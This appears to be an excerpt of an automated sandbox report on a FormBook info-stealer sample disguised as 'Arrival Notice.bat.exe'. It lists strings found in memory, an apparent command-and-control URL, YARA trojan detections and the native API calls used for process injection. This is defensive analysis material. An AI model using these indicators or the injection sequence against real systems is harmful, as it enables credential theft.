              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Abel:400%7CMaven
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4147635781.000000000493C000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.00000000049CC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033w
              Source: runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: compact.exe, 00000012.00000002.4143560755.000000000256F000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.00000000009A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: compact.exe, 00000012.00000003.2230813602.00000000077CB000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000003.3694098353.0000000007B58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://niteothemes.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com/wp-admin/admin-ajax.php
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/plugins/cmp-coming-soon-maintenance/
              Source: compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: compact.exe, 00000012.00000002.4147635781.00000000037F6000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003886000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2338332186.0000000032F46000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywY
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
              Source: compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
              Source: compact.exe, 00000012.00000002.4147635781.0000000003988000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003A18000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
              Source: compact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
              Source: compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://youtu.be/uO1hXLmT2j4
              Source: compact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 8.2.Arrival Notice.bat.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 8.2.Arrival Notice.bat.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 24.2.-6qxw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 24.2.-6qxw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000002.2005620217.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.4145840212.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000002.2005850600.0000000002410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000002.2003682546.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000011.00000002.4145476325.0000000003AB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              .NET source code contains very large array initializations
              Source: 0.2.Arrival Notice.bat.exe.5fe0000.2.raw.unpack, PingPong.csLarge array initialization: : array initializer size 12418
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Arrival Notice.bat.exe
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0042B543 NtClose,8_2_0042B543
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2B60 NtClose,LdrInitializeThunk,8_2_015B2B60
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_015B2DF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_015B2C70
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B35C0 NtCreateMutant,LdrInitializeThunk,8_2_015B35C0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B4340 NtSetContextThread,8_2_015B4340
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B4650 NtSuspendThread,8_2_015B4650
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2BF0 NtAllocateVirtualMemory,8_2_015B2BF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2BE0 NtQueryValueKey,8_2_015B2BE0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2B80 NtQueryInformationFile,8_2_015B2B80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2BA0 NtEnumerateValueKey,8_2_015B2BA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2AD0 NtReadFile,8_2_015B2AD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2AF0 NtWriteFile,8_2_015B2AF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2AB0 NtWaitForSingleObject,8_2_015B2AB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2D10 NtMapViewOfSection,8_2_015B2D10
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2D00 NtSetInformationFile,8_2_015B2D00
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2D30 NtUnmapViewOfSection,8_2_015B2D30
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2DD0 NtDelayExecution,8_2_015B2DD0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2DB0 NtEnumerateKey,8_2_015B2DB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2C60 NtCreateKey,8_2_015B2C60
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2C00 NtQueryInformationProcess,8_2_015B2C00
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2CC0 NtQueryVirtualMemory,8_2_015B2CC0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2CF0 NtOpenProcess,8_2_015B2CF0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2CA0 NtQueryInformationToken,8_2_015B2CA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2F60 NtCreateProcessEx,8_2_015B2F60
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2F30 NtCreateSection,8_2_015B2F30
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2FE0 NtCreateFile,8_2_015B2FE0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2F90 NtProtectVirtualMemory,8_2_015B2F90
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2FB0 NtResumeThread,8_2_015B2FB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2FA0 NtQuerySection,8_2_015B2FA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2E30 NtWriteVirtualMemory,8_2_015B2E30
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2EE0 NtQueueApcThread,8_2_015B2EE0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2E80 NtReadVirtualMemory,8_2_015B2E80
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B2EA0 NtAdjustPrivilegesToken,8_2_015B2EA0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3010 NtOpenDirectoryObject,8_2_015B3010
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3090 NtSetValueKey,8_2_015B3090
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B39B0 NtGetContextThread,8_2_015B39B0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3D70 NtOpenThread,8_2_015B3D70
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B3D10 NtOpenProcessToken,8_2_015B3D10
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_0130D5BC0_2_0130D5BC
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_082221480_2_08222148
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_082230E80_2_082230E8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_082251700_2_08225170
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_08222CB00_2_08222CB0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 0_2_082235200_2_08223520
